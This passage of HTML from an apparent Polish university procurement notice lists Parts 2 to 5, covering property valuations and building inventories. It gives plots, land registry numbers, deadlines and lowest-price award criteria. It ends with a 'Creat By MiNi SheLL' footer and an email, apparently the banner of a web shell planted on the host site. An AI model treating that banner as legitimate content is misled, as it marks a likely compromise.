<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II-Wykonanie wyceny wartości prawa własności nieruchomości..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)Wykonanie wyceny wartości prawa własności nieruchomości położonej w Warszawie, dzielnica Ursynów, przy ul. Rosoła, działka ewidencyjna  nr 19 o powierzchni 0,1131 ha, obręb 1-11-09, KW WA2M/00148965/2 - aktualna wartość rynkowa do ujawnienia w aktywach trwałych Uczelni (wartość księgowa).
2)Wykonanie wyceny wartości prawa własności nieruchomości położonej w Warszawie, dzielnica Ursynów, przy ul. Perkalowej, działka ewidencyjna  nr 1/1 o powierzchni 1,2128 ha, obręb 1-10-80, KW WA2M/00148965/2 - aktualna wartość rynkowa do ujawnienia w aktywach trwałych Uczelni (wartość księgowa).
3)Wykonanie wyceny wartości prawa własności nieruchomości położonej w Warszawie, dzielnica Ursynów, przy ul. Rolnej, działka ewidencyjna  nr 42/2 o powierzchni 0,0083 ha, obręb 1-10-79, KW WA2M/00148965/2 - aktualna wartość rynkowa do ujawnienia w aktywach trwałych Uczelni (wartość księgowa).
4)Wykonanie wyceny wartości prawa własności nieruchomości położonej w Warszawie, dzielnica Ursynów, przy ul. Płaskowickiej, działka ewidencyjna  nr 73 o powierzchni 0,6013 ha, obręb 1-10-79, KW WA2M/00148965/2 - aktualna wartość rynkowa do ujawnienia w aktywach trwałych Uczelni (wartość księgowa).
5)Wykonanie operatu szacunkowego do celów księgowych udziału w wysokości 0,01100 w nieruchomości gruntowej oznaczonej jako działka nr 19 z obrębu 3-05-02 o powierzchni 0,1971 ha dla której prowadzona jest księga wieczysta WA6M/00041421/5, z którym związane jest prawo własności lokalu mieszkalnego nr 14 w budynku przy ul. Kinowej 18 w Warszawie w Dzielnicy Praga Południe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.12.10-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III-Wykonanie wyceny, inwentaryzacji nieruchomości..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wykonanie wyceny wartości prawa własności oraz wartości czynszu za dzierżawę fragmentu nieruchomości o powierzchni 4,23 ha - grunt rolny, położonej w miejscowości Zacywilki, gmina Rogów, działka ewidencyjna nr 234/1 o powierzchni całkowitej 14,6100 ha, KW RA1G/00055987/6 - w celu ustalenia wysokości czynszu za dzierżawę gruntu rolnego.
2.Przeprowadzenie inwentaryzacji architektoniczno budowlanej w celu uzyskania zaświadczeń o samodzielności lokali mieszkalnych oraz założenia kartoteki budynków i lokali, ponadto wykonanie wyceny wartości lokali mieszkalnych wraz z udziałem w gruncie zlokalizowanych na terenie Leśnego Zakładu Doświadczalnego w Rogowie gospodarstwo Puczniew:
a.	Działka ewidencyjna nr 205/1 położona w Mianowie - 3 lokale mieszkalne, 
b.	Działka ewidencyjna nr 234/8 położona w Puczniewie - 1 lokal mieszkalny,
c.	Działka ewidencyjna nr 234/5 położona w Puczniewie - 1 lokal mieszkalny,
d.	Działka ewidencyjna nr 186/3 położona w Puczniewie - 1 lokal mieszkalny,
e.	Działka ewidencyjna nr 186/7 położona w Puczniewie - 1 lokal mieszkalny,
f.	Działka ewidencyjna nr 189/2 położona w Puczniewie - 1 lokal mieszkalny.
3.Przeprowadzenie inwentaryzacji architektoniczno budowlanej w celu założenia kartoteki budynków zabudowań znajdujących się na nieruchomości położonej w miejscowości Mianów, gmina Lutomiersk , działka ewidencyjna nr 205/2 o powierzchni 5,6900 ha, KW SR1L/00029669/4.
4.Wykonanie wyceny wartości prawa własności działki ewidencyjnej nr 744/7, 744/8, 744/9, 744/10, 744/11, 744/12, 744/13, 744/14, 744/15 położonych w miejscowości Rogów, gmina Rogów, KW 20729 - w celu sprzedaży aktualnym użytkownikom.
5.Wykonanie wyceny wartości prawa własności działki ewidencyjnej nr 166/1, 166/2, 166/3, 166/4, 166/5, 166/6, 166/9, 166/10, 166/11 oraz ustanowienia wynagrodzenia z tytułu służebności w drodze działka ewidencyjna 166/7 położonych w miejscowości Józefów, gmina Rogów, KW 6230 - w celu sprzedaży.
6.Wykonanie wyceny wartości prawa użytkowania wieczystego do działki ewidencyjnej 383 i 384 obręb 13 Prusy, KW LD1R/00042168/9 oraz obręb Głuchów działka 1463, 1464, 1465, 1466, gmina Głuchów KW LD1R/00042167/2 - aktualna wartość rynkowa do ujawnienia w aktywach trwałych Uczelni (wartość księgowa),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.12.10-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie IV-Wykonanie wyceny wartości prawa własności nieruchomości..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wykonanie wyceny wartości prawa własności nieruchomości położonej w miejscowości Krobów, gmina Grójec, działka ewidencyjna  nr 12/2 o powierzchni 0,3663ha, KW RA1G/00055987/6 - aktualna wartość rynkowa do ujawnienia w aktywach trwałych Uczelni (wartość księgowa).
2.Wykonanie wyceny wartości prawa własności działki ewidencyjnej nr 13/6, 13/34, 13/5, 13/53, 13/45, 13/23, 13/2 i 13/21 położonych w miejscowości Krobów, gmina Grójec, KW RA1G/00042603/7 - w celu sprzedaży,
3.Wykonanie wyceny wartości prawa własności oraz wartości stawki czynszu dzierżawnego działki ewidencyjnej 128/10 obręb Biskupice gmina Brwinów KW WA1P/00047547/4..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.12.10-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie V- określenie wartości rynkowej prawa użytkowania wieczystego nieruchomości..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.określenie wartości rynkowej prawa użytkowania wieczystego niezabudowanej działki ewidencyjnej nr 73 z obrębu 0015 Obory o powierzchni 16,99 ha, zlokalizowanej w gminie Konstancin-Jeziorna, dla której prowadzona jest księga wieczysta WA5M/00299349/2 do celów sprzedaży. Przedmiotowa działka wykorzystywana jest rolniczo. 
2.określenie wartości rynkowej prawa użytkowania wieczystego niezabudowanej działki ewidencyjnej nr 86 z obrębu 0015 Obory o powierzchni 35,33 ha, zlokalizowanej w gminie Konstancin-Jeziorna, dla której prowadzona jest księga wieczysta WA5M/00299349/2 do celów sprzedaży. Przedmiotowa działka wykorzystywana jest rolniczo. 
3.określenie wartości rynkowej prawa użytkowania wieczystego niezabudowanej działki ewidencyjnej nr 92/2 z obrębu 0015 Obory o powierzchni 43,40 ha, zlokalizowanej w gminie Konstancin-Jeziorna, dla której prowadzona jest księga wieczysta WA5M/00299349/2 do celów sprzedaży. Przedmiotowa działka wykorzystywana jest rolniczo..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.12.10-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com